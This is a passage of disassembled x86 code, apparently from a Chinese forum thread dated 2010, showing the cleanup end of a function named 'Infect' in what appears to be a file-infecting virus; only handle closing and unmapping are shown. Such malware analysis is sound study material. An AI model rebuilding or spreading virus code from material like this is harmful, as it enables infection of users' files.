.text:004071D7 loc_4071D7: ; DATA XREF: .rdata:00409F04�o
.text:004071D7 xor eax, eax
.text:004071D9 inc eax
.text:004071DA retn
.text:004071DB ; ---------------------------------------------------------------------------
.text:004071DB
.text:004071DB loc_4071DB: ; DATA XREF: .rdata:00409F08�o
.text:004071DB mov esp, [ebp+var_18]
.text:004071DE cmp [ebp+lpBaseAddress], 0
.text:004071E2 jz short loc_4071ED
.text:004071E4 push [ebp+lpBaseAddress] ; lpBaseAddress
.text:004071E7 call ds:UnmapViewOfFile
.text:004071ED
.text:004071ED loc_4071ED: ; CODE XREF: Infect+6AC�j
.text:004071ED cmp [ebp+hObject], 0
.text:004071F1 jz short loc_4071FC
.text:004071F3 push [ebp+hObject] ; hObject
.text:004071F6 call ds:CloseHandle
.text:004071FC
.text:004071FC loc_4071FC: ; CODE XREF: Infect+6BB�j
.text:004071FC cmp [ebp+hFile], 0FFFFFFFFh
.text:00407200 jz short loc_40720B
.text:00407202 push [ebp+hFile] ; hObject
.text:00407205 call ds:CloseHandle
.text:0040720B
.text:0040720B loc_40720B: ; CODE XREF: Infect+6CA�j
.text:0040720B or [ebp+var_4], 0FFFFFFFFh
.text:0040720F
.text:0040720F loc_40720F: ; CODE XREF: Infect+69F�j
.text:0040720F mov ecx, [ebp+var_10]
.text:00407212 mov large fs:0, ecx
.text:00407219 pop edi
.text:0040721A pop esi
.text:0040721B pop ebx
.text:0040721C leave
.text:0040721D retn 4
.text:0040721D Infect endp
|
|
发表于 2010-7-7 13:13
发表于 2010-7-7 13:19
发表于 2010-8-10 03:01
